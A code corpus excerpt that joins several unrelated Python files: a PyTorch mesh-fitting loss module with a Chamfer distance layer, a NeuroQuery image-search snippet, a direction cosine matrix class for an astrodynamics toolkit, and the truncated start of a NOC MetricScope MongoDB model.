sample_vc[0][gt_knn_idx[0].view(-1)].view(-1, k, 3) pre_ratio = torch.exp(-(gt_knn_dist[0] / (2 * (sigma ** 2)))) mask = pre_ratio == 0 mask[:, 1:] = 0 pre_ratio[mask] = 1 pre_ratio = pre_ratio / torch.sum(pre_ratio, dim=-1, keepdim=True) pre_gauss_color = torch.sum(pre_color * pre_ratio.unsqueeze(-1), dim=1) chamfer_loss = self.w_chamfer * torch.mean(torch.abs(sample_vc[0] - gt_gauss_color)) + \ self.w_chamfer_op * torch.mean(torch.abs(pre_gauss_color - vc_gt)) loss = chamfer_loss elif self.options.sample_mix: if self.options.cur_step % 600 < 150: sampler_coord, sample_norm, sample_vc = sampler_color(f_gt, gt_coord.unsqueeze(0), sample_num, colors=vc_gt.unsqueeze(0), bypass=self.options.no_sample) dist1, dist2, idx1, idx2 = self.chamfer_dist(sampler_coord, self.pred_coord[self.part_n]) gt_color = sample_vc[0][idx2[0].long()] pre_color = pred_vc[idx1[0].long()] chamfer_loss = self.w_chamfer * torch.mean(torch.abs(pred_vc - gt_color)) + \ self.w_chamfer_op * torch.mean(torch.abs(pre_color - sample_vc)) loss = chamfer_loss else: sample_num = int(pred_vc.shape[0]) sampler_coord, sample_norm, sample_vc = sampler_color(faces, self.pred_coord[self.part_n], sample_num, colors=self.pred_vc[self.part_n], bypass=self.options.no_sample) dist1, dist2, idx1, idx2 = self.chamfer_dist(gt_coord.unsqueeze(0), sampler_coord) pre_color = sample_vc[0][idx1[0].long()] dist1 = torch.sqrt(dist1) # dist1 = (dist1 + 1e-6) / torch.mean(dist1 + 1e-6) chamfer_loss = torch.mean(torch.abs(pre_color - vc_gt)) loss = chamfer_loss else: sample_num = int(pred_vc.shape[0]) sampler_coord, sample_norm, sample_vc = sampler_color(faces, self.pred_coord[self.part_n], sample_num, colors=self.pred_vc[self.part_n], bypass=self.options.no_sample) dist1, dist2, idx1, idx2 = self.chamfer_dist(gt_coord.unsqueeze(0), sampler_coord) pre_color = sample_vc[0][idx1[0].long()] dist1 = torch.sqrt(dist1) # dist1 = (dist1+1e-6) / torch.mean(dist1+1e-6) chamfer_loss = torch.mean(torch.abs(pre_color - vc_gt)) loss = chamfer_loss # _, _, _, idx2 = self.chamfer_dist(gt_coord.unsqueeze(0), self.pred_coord) self.pred_vc[self.part_n][self.pred_vc[self.part_n] > 1] = 1 self.pred_vc[self.part_n][self.pred_vc[self.part_n] < 0] = 0 return loss, { "loss": loss, "loss_chamfer": chamfer_loss, "loss_texture": texture_chamfer_loss, "loss_consistent": consistent_loss, "loss_edge": edge_loss, "loss_area": area_loss, "loss_lap": lap_loss, "loss_beam": beam_loss } def pairwise_dist(self, xyz1, xyz2): r_xyz1 = torch.sum(xyz1 * xyz1, dim=2, keepdim=True) # (B,N,1) r_xyz2 = torch.sum(xyz2 * xyz2, dim=2, keepdim=True) # (B,M,1) mul = torch.matmul(xyz2, xyz1.permute(0, 2, 1)) # (B,M,N) dist = r_xyz2 - 2 * mul + r_xyz1.permute(0, 2, 1) # (B,M,N) return torch.abs(dist) def cal_consistent_loss(self, faces, colors, face_uvs, uvs, texture): faces_flatten = faces.view(-1) # (nf * 3) face_colors = colors[faces_flatten] # nf3 * 3 face_uvs_flatten = face_uvs.view(-1) # (nf * 3) face_uvs = uvs[face_uvs_flatten] # nf3 * 2 texture_colors = uv2color(face_uvs, texture) return torch.mean(torch.abs(texture_colors - face_colors)) # delta_e to delta_v def delta_e2c(self, output): mesh = self.mesh[0] output = output.squeeze(0).t() edges = mesh.edges edges_sides = mesh.edges_sides # print(output) vsd = torch.zeros(size=[len(mesh.vs), 24, 3], device=self.device) # 24 is max degree of vertex,maybe change vsd[edges[:, 0], edges_sides[:, 0], :] += output[:edges.shape[0], :3] vsd[edges[:, 1], edges_sides[:, 1], :] += output[:edges.shape[0], 3:] vsd = vsd.sum(dim=1) / (vsd != 0).sum(dim=1).float() if torch.any((vsd != 0).sum(dim=1).float() < 2e-5): print("error! NaN in delta_e2c") return vsd class MeshPriorLoss(nn.Module): def __init__(self, options): super(MeshPriorLoss, self).__init__() self.options = options self.chamfer_dist = ChamferDist() self.delta_vs = None self.delta_vc = None self.meshes = self.mesh = None self.device = None self.pred_coord = [] self.pred_color = [] self.w_edge = options.weight_edge_loss self.w_area = options.weight_area_loss self.w_normal = options.weight_normal_loss self.w_move = options.weight_move_loss self.w_chamfer = options.weight_chamfer self.w_chamfer_op = options.weight_chamfer_opposite self.w_lap = options.weight_lap_loss self.w_mse = options.weight_mse_loss self.w_beam = options.weight_beam_loss self.w_color = options.weight_color_loss self.l2_loss = nn.MSELoss(reduction='mean') self.part_n = None self.idx_init = None self.factor_xyz = torch.tensor([75.56538,23.655998,66.17292,-42.742756,-11.807249,-0.109063]).cuda() self.factor_dist = torch.tensor([37.95355899,7.98650955]).cuda() self.mid_point = torch.tensor([-3.1534e+00, -2.7057e-02, 3.0419e+01]).cuda() def forward(self, output, targets): loss = chamfer_loss = move_loss = edge_loss = normal_loss = lap_loss = beam_loss = 0 # for i,mesh in enumerate(self.meshes): self.mesh = np.asarray([self.meshes[self.part_n]]) self.delta_vs = self.delta_e2v(output) # geo_color or not if self.options.geo_color: self.delta_vc = self.delta_vs[:,3:] self.delta_vs = self.delta_vs[:,:3] # abs vs or not if self.options.abs_vs: pred_coord = self.delta_vs else: pred_coord = torch.tensor(self.mesh[0].vs, dtype=torch.float, device=self.device) + self.delta_vs pred_coord = pred_coord.unsqueeze(0) if len(self.pred_coord) < self.options.batch_size: self.pred_coord.append(pred_coord) # if self.options.geo_color: self.pred_color.append(pred_coord) else: self.pred_coord[self.part_n] = pred_coord faces = torch.tensor(self.mesh[0].faces, dtype=torch.long, device=self.device).unsqueeze(0) move_loss = self.w_move * F.smooth_l1_loss( self.delta_vs, torch.zeros_like(self.delta_vs), reduction='mean') if self.w_move > 0 else 0 edge_loss = self.w_edge * self.cal_edge_loss() if self.w_edge > 0 else 0 area_loss = self.w_area * self.cal_area_loss(faces, self.pred_coord[self.part_n]) if self.w_area > 0 else 0 gt_coord = torch.tensor(targets[0][self.part_n], device=self.device).float() # # chamfer_losss # if self.options.method == 'chamfer': # sample_num = int((self.options.ninput_edges / 2 + # self.options.cur_step * self.options.ninput_edges / self.options.epoch_steps)*2) # # sampler_coord, sample_norm, _ = sampler(faces, self.pred_coord[self.part_n], # # sample_num, bypass=self.options.no_sample) # # #sample uvs # sampler_coord, _, sample_uvs = sampler_uv( # torch.from_numpy(self.mesh[0].faces).unsqueeze(0).cuda(), # pred_coord, # sample_num, # torch.from_numpy(self.mesh[0].uvs).unsqueeze(0).cuda(), # torch.from_numpy(self.mesh[0].face_uvs).unsqueeze(0).cuda(), # ) # vc_gt = uv2color(sample_uvs[0],torch.from_numpy(self.mesh[0].texture).cuda()) # #gt_faces = torch.tensor(targets[1], dtype=torch.long, device=self.device).unsqueeze(0) # #sigma = self.options.ratio_gt_sample * ( 1 - (self.options.cur_step / self.options.epoch_steps)*0.5) # # if self.options.gt_sample: # # gt_sampler, _, ratio = sampler(gt_faces, gt_coord.unsqueeze(0), # # int(sample_num * 2), bypass=self.options.no_sample, # # sigma=sigma) # # dist1, dist2, idx1, idx2 = self.chamfer_dist(gt_sampler, sampler_coord) # # ratio_gt_sample or not # # if self.options.ratio_gt_sample > 0.: # # # gt_sampler, _ ,ratio = sampler(gt_faces, gt_coord.unsqueeze(0), # # # int(sample_num*1.5), bypass=self.options.no_sample) # # dist1 *= ratio # # dist2 *= ratio[0][idx2.long()] # # else: # # dist1, dist2, idx1, idx2 = self.chamfer_dist(gt_coord.unsqueeze(0), sampler_coord) # #geo_color # dist1, dist2, idx1, idx2 = self.chamfer_dist(gt_coord.unsqueeze(0),torch.from_numpy(self.mesh[0].vs).unsqueeze(0).cuda().float()) # vc_init = torch.from_numpy(targets[2][self.part_n]).cuda()[idx2[0].long()] # pred_vc = vc_init + self.delta_vc # sample_num = int((self.options.ninput_edges / 2 + # self.options.cur_step * self.options.ninput_edges / self.options.epoch_steps)*2) # #sample uvs # sample_coord, _, sample_uvs,sample_color = sampler_uv( # torch.from_numpy(self.mesh[0].faces).unsqueeze(0).cuda(), # pred_coord, # sample_num, # torch.from_numpy(self.mesh[0].uvs).unsqueeze(0).cuda(), # torch.from_numpy(self.mesh[0].face_uvs).unsqueeze(0).cuda(), # pred_vc.unsqueeze(0) # ) # vc_gt = uv2color(sample_uvs[0],torch.from_numpy(self.mesh[0].texture).cuda()) # dist1, dist2, idx1, idx2 = self.chamfer_dist(gt_coord.unsqueeze(0), sample_coord) sample_num = int((self.options.ninput_edges / 2 + self.options.cur_step * self.options.ninput_edges / self.options.epoch_steps)*2) sample_coord, sample_norm, _ = sampler(faces, self.pred_coord[self.part_n],sample_num) dist1, dist2, idx1, idx2 = self.chamfer_dist(gt_coord.unsqueeze(0), sample_coord) if self.w_mse>0: vc_uv = torch.from_numpy(self.mesh[0].vc[:, :2]).float() sample_coord, _, sample_uvs = sampler_uv( torch.from_numpy(self.mesh[0].faces).unsqueeze(0).cuda(), pred_coord, sample_num, torch.from_numpy(self.mesh[0].uvs).unsqueeze(0).cuda(), torch.from_numpy(self.mesh[0].face_uvs).unsqueeze(0).cuda(), ) mse_coord = uv2color(sample_uvs[0],torch.from_numpy(self.mesh[0].texture_np).cuda()) sample_coord = sample_coord.squeeze(0) if self.options.dist: sample_coord = torch.sqrt(torch.sum((sample_coord-self.mid_point)**2, dim=-1, keepdim=True)) #mse_coord = mse_coord*self.factor_dist[0] + self.factor_dist[1] else: mse_coord = mse_coord*self.factor_xyz[0:3] + self.factor_xyz[3:] dist1, dist2, idx1, idx2 = self.chamfer_dist(gt_coord.unsqueeze(0), sample_coord.unsqueeze(0)) #color_loss = self.l2_loss(vc_gt.unsqueeze(0),sample_color) * self.w_color if self.w_color > 0 else 0 color_loss = 0 mse_loss = self.l2_loss(sample_coord,mse_coord)*self.w_mse if self.w_mse > 0 else 0 chamfer_loss = self.w_chamfer * (torch.mean(torch.sqrt(dist1)) + self.w_chamfer_op * torch.mean(torch.sqrt(dist2))) normal_loss = self.w_normal * self.cal_normal_loss(pred_coord) if self.w_normal > 0 else 0 lap_loss = self.w_lap * \ self.cal_laplace_loss(self.mesh[0].vs, self.pred_coord[self.part_n]) if self.w_lap > 0 else 0 beam_loss = 0 # beam_loss = self.w_beam * self.cal_beam_loss(sampler_coord, sample_norm, gt_coord, # k=sample_num // self.options.beam_k_ratio, # radius=self.options.beam_rad) if self.w_beam > 0 else 0 # # fix_idx loss # elif self.options.method == 'fix_idx': # vs_init = self.mesh[0].vs # vs_init = torch.from_numpy(vs_init).float().unsqueeze(0).cuda() # _, _, idx, _ = self.chamfer_dist(gt_coord.unsqueeze(0), vs_init) # chamfer_loss = torch.mean( # torch.norm(pred_coord.squeeze(0)[idx.long().squeeze(0)] - gt_coord.squeeze(0), dim=1) ** 2) # normal_loss = lap_loss = beam_loss = 0. # # else: # raise loss = (chamfer_loss + move_loss + edge_loss + lap_loss + beam_loss + color_loss + mse_loss) # if beam_gap_loss > chamfer_loss: # self.options.weight_beam_gap /= 2.0 if move_loss > chamfer_loss * self.options.theta: self.w_move /= 2.0 if edge_loss > chamfer_loss * self.options.theta: self.w_edge /= 2.0 if area_loss > chamfer_loss * self.options.theta: self.w_area /= 2.0 # if normal_loss > chamfer_loss: # self.w_normal /= 1.5 if lap_loss > chamfer_loss: self.w_lap /= 2.0 return loss, { "loss": loss, "loss_chamfer": chamfer_loss, "loss_mse":mse_loss, "loss_normal": normal_loss, "loss_move": move_loss, "loss_edge": edge_loss, "loss_area": area_loss, "loss_lap": lap_loss, "loss_beam": beam_loss, "loss_color": color_loss } def cal_area_loss(self, faces, verts): batch_size = faces.shape[0] faces_flatten = faces.view(batch_size, -1) - 1 # b * (nv * 3) face_verts = verts[:, faces_flatten[0]].view(batch_size, -1, 3, 3) # b * nf * 3 * 3 for i in range(batch_size): # could batch? face_verts[i] = verts[i, faces_flatten[i]].view(-1, 3, 3) # nf * 3 * 3 v1 = face_verts[:, :, 1] - face_verts[:, :, 0] # b * nv * 3 v2 = face_verts[:, :, 2] - face_verts[:, :, 0] # b * nv * 3 # cal face areas areas = torch.sqrt( torch.sum(v1 * v1, dim=-1) * torch.sum(v2 * v2, dim=-1) - (torch.sum(v1 * v2, dim=-1)) ** 2 + 1e-7) / 2.0 return torch.mean(areas) def laplace_coord(self, input, lap_idx): input = input.type(torch.float32) idx = torch.tensor(lap_idx, dtype=torch.int64, device=self.device) mask = idx < 0 valid_idx = idx.clone() valid_idx[mask] = 0 v = input[valid_idx] v[mask] = 0 lap_coord = input - v.sum(dim=1) / (v.sum(dim=2) != 0).type(torch.float32).sum(dim=1).unsqueeze(-1) return lap_coord def cal_laplace_loss(self, input, output): input = torch.tensor(input, device=self.device) lap_in = self.laplace_coord(input, self.mesh[0].lap_idx) lap_out = self.laplace_coord(output.squeeze(0), self.mesh[0].lap_idx) lap_loss = self.l2_loss(lap_in, lap_out) * lap_in.size(-1) return lap_loss def pairwise_dist(self, xyz1, xyz2): r_xyz1 = torch.sum(xyz1 * xyz1, dim=2, keepdim=True) # (B,N,1) r_xyz2 = torch.sum(xyz2 * xyz2, dim=2, keepdim=True) # (B,M,1) mul = torch.matmul(xyz2, xyz1.permute(0, 2, 1)) # (B,M,N) dist = r_xyz2 - 2 * mul + r_xyz1.permute(0, 2, 1) # (B,M,N) return dist def cal_beam_loss(self, sample_coord, sample_norm, gt_coord, radius=1e-2, k=5): # TODO: very memory consuming, need some optimizations gt_coord = gt_coord.unsqueeze(0) pair_dist = self.pairwise_dist(gt_coord, sample_coord) # (B,M,N) sample_knn_dist, sample_knn_idx = pair_dist.topk(k, largest=False, dim=-1) gt_knn_dist, gt_knn_idx = pair_dist.topk(k, largest=False, dim=-2) gt_knn_thresh = gt_knn_dist[:, -1, :] sample_knn_thresh = gt_knn_thresh[0, sample_knn_idx] knn_mask = sample_knn_dist <= sample_knn_thresh knn_mask = torch.any(knn_mask, dim=-1) pair_dot = torch.matmul(sample_norm, gt_coord.permute(0, 2, 1)) pair_radius = pair_dist - pair_dot ** 2 mask = pair_radius > (radius ** 2) loss_mask = torch.all(mask, dim=-1) pair_dist[mask] = 1e5 min_dist, _ = torch.min(pair_dist, dim=-1) min_dist[loss_mask] = 0 min_dist[knn_mask] = 0 min_dist = torch.sqrt(torch.abs(min_dist)) beam_loss = torch.mean(min_dist) return beam_loss def cal_edge_loss(self): coord = self.pred_coord[self.part_n] edges = torch.tensor(self.mesh[0].edges, dtype=torch.long, device=self.device) edges_flatten = edges.reshape(-1) coord_flatten = coord[:, edges_flatten] edge_coords = coord_flatten.reshape((-1, 2, 3)) edge_length = torch.mean(torch.sum((edge_coords[:, 0] - edge_coords[:, 1]) ** 2, dim=1)) return edge_length def cal_normal_loss(self,vs): vs.squeeze_(0) mesh = self.mesh[0] edges = mesh.edge_points vec_edge01 = F.normalize(vs[edges[:, 0]] - vs[edges[:, 1]], dim=1) vec_edge02 = F.normalize(vs[edges[:, 0]] - vs[edges[:, 2]], dim=1) vec_edge03 = F.normalize(vs[edges[:, 0]] - vs[edges[:, 3]], dim=1) face1_normal = F.normalize(torch.mul(vec_edge01,vec_edge02),dim=1) face2_normal = F.normalize(torch.mul(vec_edge01,vec_edge03),dim=1) cos = 1 - torch.mean(torch.abs(torch.sum(face1_normal * face2_normal, dim=1))) # normals = F.normalize(v_normals[edges[:, 0]], dim=1) # cos = torch.mean(torch.abs(torch.sum(vec_edges * normals, dim=1))) # ##return cos # # face_side = mesh.face_side # edge1 = pred_coord[mesh.faces[:, 0]] - pred_coord[mesh.faces[:, 1]] # edge2 = pred_coord[mesh.faces[:, 1]] - pred_coord[mesh.faces[:, 2]] # face_normal = torch.mul(edge1, edge2) # v_normals = torch.zeros(size=[len(mesh.vs), 24, 3], device=self.device) # v_normals[:, face_side[:, :], :] += face_normal[face_side[:, :]] # v_normals = v_normals.sum(dim=1) # # normals = F.normalize(v_normals[edges[:, 0]], dim=1) # cos = torch.mean(torch.abs(torch.sum(vec_edges * normals, dim=1))) return cos # delta_e to delta_v def delta_e2v(self, output): mesh = self.mesh[0] output = output.squeeze(0).t() edges = mesh.edges edges_sides = mesh.edges_sides # print(output) vsd = torch.zeros(size=[len(mesh.vs), 24, 3], device=self.device) # 24 is max degree of vertex,maybe change vsd[edges[:, 0], edges_sides[:, 0], :] += output[:edges.shape[0], :3] vsd[edges[:, 1], edges_sides[:, 1], :] += output[:edges.shape[0], 3:] vsd = vsd.sum(dim=1) / (vsd != 0).sum(dim=1).float() return vsd # Chamfer's distance module @thibaultgroueix # GPU tensors only class ChamferFunction(Function): @staticmethod def forward(ctx, xyz1, xyz2): batchsize, n, _ = xyz1.size() _, m, _ = xyz2.size() dist1 = torch.zeros(batchsize, n) dist2 = torch.zeros(batchsize, m) idx1 = torch.zeros(batchsize, n).type(torch.IntTensor) idx2 = torch.zeros(batchsize, m).type(torch.IntTensor) dist1 = dist1.cuda() dist2 = dist2.cuda() idx1 = idx1.cuda() idx2 = idx2.cuda() chamfer.forward(xyz1, xyz2, dist1, dist2, idx1, idx2) ctx.save_for_backward(xyz1, xyz2, idx1, idx2) return dist1, dist2, idx1, idx2 @staticmethod def backward(ctx, graddist1, graddist2, _idx1, _idx2): xyz1, xyz2, idx1, idx2 = ctx.saved_tensors graddist1 = graddist1.contiguous() graddist2 = graddist2.contiguous() gradxyz1 = torch.zeros(xyz1.size()) gradxyz2 = torch.zeros(xyz2.size()) gradxyz1 = gradxyz1.cuda() gradxyz2 = gradxyz2.cuda() chamfer.backward(xyz1, xyz2, gradxyz1, gradxyz2, graddist1, graddist2, idx1, idx2) return gradxyz1, gradxyz2 class ChamferDist(nn.Module): def __init__(self): super(ChamferDist, self).__init__() def forward(self, input1, input2): return ChamferFunction.apply(input1, input2) if __name__ == "__main__": batch_size = 8 n, m = 30, 20 xyz1 = torch.rand((batch_size, n, 3)).cuda() xyz2 = torch.rand((batch_size, m, 3)).cuda() # # dist1 = torch.zeros(batch_size, n).cuda() # dist2 = torch.zeros(batch_size, m).cuda() # # idx1 = torch.zeros((batch_size, n), dtype=torch.int).cuda() # idx2 = torch.zeros((batch_size, m), dtype=torch.int).cuda() # # chamfer.forward(xyz1, xyz2, dist1, dist2, idx1, idx2) # print(dist1) # print(dist2) # print(idx1) # print(idx2) a = ChamferDist() print("test") print(a(xyz1, xyz2))
nilq/baby-python
python
from neuroquery import datasets from neuroquery_image_search import NeuroQueryImageSearch datasets.fetch_neuroquery_model() NeuroQueryImageSearch()
nilq/baby-python
python
# -*- coding: utf-8 -*- """ dcm - Direction Cosine Matric (DCM) class for Astrodynamic Toolkit Copyright (c) 2017 - Michael Kessel (mailto: the.rocketredneck@gmail.com) a.k.a. RocketRedNeck, RocketRedNeck.com, RocketRedNeck.net RocketRedNeck and MIT Licenses RocketRedNeck hereby grants license for others to copy and modify this source code for whatever purpose other's deem worthy as long as RocketRedNeck is given credit where where credit is due and you leave RocketRedNeck out of it for all other nefarious purposes. Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. **************************************************************************************************** """ import numpy as np from Astro import Quaternion class dcm(np.ndarray): ''' % DCM Direction Cosine Matrix (DCM) constructor % Creates a dcm object which conforms to DCM mathematics and allows % operations on a series of DCMs (N, used to represent a time varying % DCM). % % Usage: M = dcm; % Template % M = dcm(x); % M = dcm(x,option); % % Inputs: x Any of the following forms: % (3x3)xN double % 3x3 (assumes N=1) % 9xN double (stacked DCM, see option) % 4xN double (assumed quaternion) % quaternion % dcm % % option Either 'rows' (default) or 'columns' indicating the 9xN % form is to be interpreted as stack transposed rows, or % stacked columns, respectively. % % Outputs: M The dcm object. % % See also quaternion % %============================================================================== ''' def __new__(cls,data=None, **kwargs): # Most common issue in here is the dimension of the inputs # Crease an exception we can just reference for convenience dimError = ValueError('Only Nx3x3, Nx1x4, Nx1x9, dcm, or quaternion allowed.') if data is None: data = np.zeros([1,3,3]) data[:,0,0] = 1 data[:,1,1] = 1 data[:,2,2] = 1 # If a quaternion was passed in, just return it at exit # All other type cases require more scrutiny inType = type(data) if (issubclass(inType,dcm)): d = data elif (issubclass(inType,list) or issubclass(inType,np.ndarray)): # TODO: If data has units, strip the units they are not required d = np.array(data).view(cls) # Parse the dimensions to fiqure out what we have # t slices (in "time" or sequence) # r rows # c columns numDim = len(d.shape) if (numDim < 2): raise dimError if (numDim < 3): t = 1 d = d[np.newaxis,...] else: t = d.shape[0] r = d.shape[1] c = d.shape[2] if ((r==3) and (c==3)): # The object already looks like a 3x3 DCM # we won't assess the normality, just pass it back pass elif ((r==1) and (c==4)): # Object looks like a tx1x4 stream of quaternions # We don't assess normality, we just convert element # by element q = d qsq = q ** 2 q01 = q[:,0] * q[:,1] q02 = q[:,0] * q[:,2] q03 = q[:,0] * q[:,3] q12 = q[:,1] * q[:,2] q13 = q[:,1] * q[:,3] q23 = q[:,2] * q[:,3] d = np.ndarray([t, 3, 3]); d[:,0,0] = 1 - 2*(qsq[:,2]+qsq[:,3]) d[:,0,1] = 2*(q12 - q03) d[:,0,2] = 2*(q13 + q02) d[:,1,0] = 2*(q12 + q03) d[:,1,1] = 1 - 2*(qsq[:,3]+qsq[:,1]) d[:,1,2] = 2*(q23 - q01) d[:,2,0] = 2*(q13 - q02) d[:,2,1] = 2*(q23 + q01) d[:,2,2] = 1 - 2*(qsq[:,1]+qsq[:,2]) elif ((r==1) and (c==9)): # Parse the keyword arguments, extracting what makes sense # and tossing what doesn't rowcol = None for key in kwargs: if (key.lower() == 'direction'): rowcol = kwargs[key] if (issubclass(type(rowcol),str)): if (rowcol.lower() != 'columns'): raise ValueError('direction must be either "rows" or "columns"') else: rowcol = 'rows' if (rowcol == 'columns'): d = d[:,:,(0, 3, 6, 1, 4, 7, 2, 5, 8)] d = d.reshape([t,3,3]) else: raise dimError else: raise TypeError('Input must be derived from list, np.array, dcm, or quaternion') return d def __repr__(self): s = repr(self.__array__()).replace('array', 'dcm') # now, 'dcm' has 3 letters, and 'array' 5, so the columns don't # line up anymore. We need to remove two spaces l = s.splitlines() for i in range(1, len(l)): if l[i]: l[i] = l[i][2:] return '\n'.join(l) ''' transpose - a DCM transpose that follows our stacking rules NOTE: Can also use the ~ operator (inverse) ''' def transpose(self): # If the user sliced off the t (sequence) axis we need to # only transpose the axes present in the correct order if (len(self.shape) < 3): return super(dcm,self).transpose().view(dcm) else: return super(dcm,self).transpose(0, 2, 1).view(dcm) ''' det - determinant of dcm Necessary but not sufficient condition is that abs(det(dcm)) = 1 [[a b c] [d e f] [g h i]] det = aei + bfg + cdh - ceg - bdi - afh ''' def det(self): if (len(self.shape) < 3): return (self[0,0]*self[1,1]*self[2,2] + self[0,1]*self[1,2]*self[2,0] + self[0,2]*self[1,0]*self[2,1] - self[0,2]*self[1,1]*self[2,0] - self[0,1]*self[1,0]*self[2,2] - self[0,0]*self[1,2]*self[2,1]) else: return (self[:,0,0]*self[:,1,1]*self[:,2,2].view(np.ndarray) + self[:,0,1]*self[:,1,2]*self[:,2,0].view(np.ndarray) + self[:,0,2]*self[:,1,0]*self[:,2,1].view(np.ndarray) - self[:,0,2]*self[:,1,1]*self[:,2,0].view(np.ndarray) - self[:,0,1]*self[:,1,0]*self[:,2,2].view(np.ndarray) - self[:,0,0]*self[:,1,2]*self[:,2,1].view(np.ndarray)) ''' diagonal - return the diagonal of each DCM as an array ''' def diagonal(self): if (len(self.shape) < 3): return np.array((self[0,0], self[1,1], self[2,2])) else: return np.array((self[:,0,0], self[:,1,1], self[:,2,2])) ''' trace - sum of diagonal ''' def trace(self): return sum(self.diagonal()) ''' orthonormal - returns True for each DCM in a stack that is sufficiently orthogonal and normal as determined by the rss of the associated quaternion being sufficiently close to 1.0 Default tolerance is 1e-9 ''' def orthonormal(self,tolerance=1.0e-9): # The simplest thing to do is let the quaternion do the work # Not sure if this is the fastest way, but it is the easiest return Quaternion.quaternion(self).orthonormal() # ------------------------------------------------------------------- # Operator Overloads # # Returns NotImplemented for anything that does not make sense # ------------------------------------------------------------------- ''' object.__add__(self, other) + ''' def __add__(self,b): return NotImplemented ''' object.__sub__(self, other) - ''' def __sub__(self,b): return NotImplemented ''' object.__mul__(self, other) * ''' def __mul__(self,b): return self.__matmul__(b) ''' object.__matmul__(self, other) @ ''' def __matmul__(self, b): inType = type(b) if (issubclass(inType,dcm)): return np.matmul(self,b).view(dcm) elif (issubclass(inType,list) or issubclass(inType,np.ndarray)): # TODO: Need to implement matric vector logic return NotImplemented else: raise TypeError('Target type must be a dcm') ''' object.__truediv__(self, other) / ''' def __truediv__(self,b): return NotImplemented ''' object.__floordiv__(self, other) // ''' def __floordiv__(self,b): return NotImplemented ''' object.__mod__(self, other) % ''' def __mod__(self,b): return NotImplemented ''' object.__divmod__(self, other) divmod() ''' def __divmod__(self,b): return NotImplemented ''' object.__pow__(self, other[, modulo]) pow(), ** ''' def __pow__(self,b,*args): return NotImplemented ''' object.__lshift__(self, other) << ''' def __lshift__(self,b): return NotImplemented ''' object.__rshift__(self, other) >> ''' def __rshift__(self,b): return NotImplemented ''' object.__and__(self, other) & ''' def __and__(self,b): return NotImplemented ''' object.__xor__(self, other) ^ ''' def __xor__(self,b): return NotImplemented ''' object.__or__(self, other) | ''' def __or__(self,b): return NotImplemented ''' Backup functions when left side is not of the correct type object.__radd__(self, other) + ''' def __radd__(self,b): return NotImplemented ''' object.__rsub__(self, other) - ''' def __rsub__(self,b): return NotImplemented ''' object.__rmul__(self, other) * ''' def __rmul__(self,b): return NotImplemented ''' object.__rmatmul__(self, other) @ ''' def __rmatmul__(self,b): return NotImplemented ''' object.__rtruediv__(self, other) / ''' def __rtruediv__(self,b): return NotImplemented ''' object.__rfloordiv__(self, other) // ''' def __rfloordiv__(self,b): return NotImplemented ''' object.__rmod__(self, other) % ''' def __rmod__(self,b): return NotImplemented ''' object.__rdivmod__(self, other) divmod() ''' def __rdivmod__(self,b): return NotImplemented ''' object.__rpow__(self, other) pow(), ** ''' def __rpow__(self,b): return NotImplemented ''' object.__rlshift__(self, other) << ''' def __rlshift__(self,b): return NotImplemented ''' object.__rrshift__(self, other) >> ''' def __rrshift__(self,b): return NotImplemented ''' object.__rand__(self, other) & ''' def __rand__(self,b): return NotImplemented ''' object.__rxor__(self, other) ^ ''' def __rxor__(self,b): return NotImplemented ''' object.__ror__(self, other) | ''' def __ror__(self,b): return NotImplemented ''' object.__iadd__(self, other) += ''' def __iadd__(self,b): return NotImplemented ''' object.__isub__(self, other) -= ''' def __isub__(self,b): return NotImplemented ''' object.__imul__(self, other) *= ''' def __imul__(self,b): return NotImplemented ''' object.__imatmul__(self, other) @= ''' def __imatmul__(self,b): return NotImplemented ''' object.__itruediv__(self, other) /= ''' def __itruediv__(self,b): return NotImplemented ''' object.__ifloordiv__(self, other) //= ''' def __ifloordiv__(self,b): return NotImplemented ''' object.__imod__(self, other) %= ''' def __imod__(self,b): return NotImplemented ''' object.__ipow__(self, other[, modulo]) **= ''' def __ipow__(self,b,*args): return NotImplemented ''' object.__ilshift__(self, other) <<= ''' def __ilshift__(self,b): return NotImplemented ''' object.__irshift__(self, other) >>= ''' def __irshift__(self,b): return NotImplemented ''' object.__iand__(self, other) &= ''' def __iand__(self,b): return NotImplemented ''' object.__ixor__(self, other) ^= ''' def __ixor__(self,b): return NotImplemented ''' object.__ior__(self, other) |= ''' def __ior__(self,b): return NotImplemented ''' object.__neg__(self) - ''' # Use superclass ''' object.__pos__(self) + ''' # Use superclass ''' object.__abs__(self) abs() ''' def __abs__(self): return NotImplemented ''' object.__invert__(self) ~ ''' def __invert__(self): return self.transpose() ''' object.__complex__(self) complex() ''' def __complex__(self): return NotImplemented ''' object.__int__(self) int() ''' def __int__(self): return NotImplemented ''' object.__float__(self) float() ''' def __float__(self): return NotImplemented ''' object.__round__(self[, n]) round() ''' def __round__(self, *args): return NotImplemented ''' object.__index__(self) operator.index() ''' # Use superclass
nilq/baby-python
python
# -*- coding: utf-8 -*- # --------------------------------------------------------------------- # MetricScope model # --------------------------------------------------------------------- # Copyright (C) 2007-2019 The NOC Project # See LICENSE for details # --------------------------------------------------------------------- # Python modules from __future__ import absolute_import, print_function import operator from threading import Lock # Third-party modules import six from mongoengine.document import Document, EmbeddedDocument from mongoengine.fields import ( StringField, ListField, EmbeddedDocumentField, UUIDField, BooleanField, ) import cachetools # NOC Modules from noc.config import config from noc.core.prettyjson import to_json from noc.core.model.decorator import on_delete_check id_lock = Lock() @six.python_2_unicode_compatible class KeyField(EmbeddedDocument): # Table field name field_name = StringField() # Model reference, i.e. sa.ManagedObject model = StringField() def __str__(self): return self.field_name def to_json(self): return {"field_name": self.field_name, "model": self.model} @property def field_type(self): return "UInt64" @six.python_2_unicode_compatible class PathItem(EmbeddedDocument): name = StringField() is_required = BooleanField() # Default value, when empty default_value = 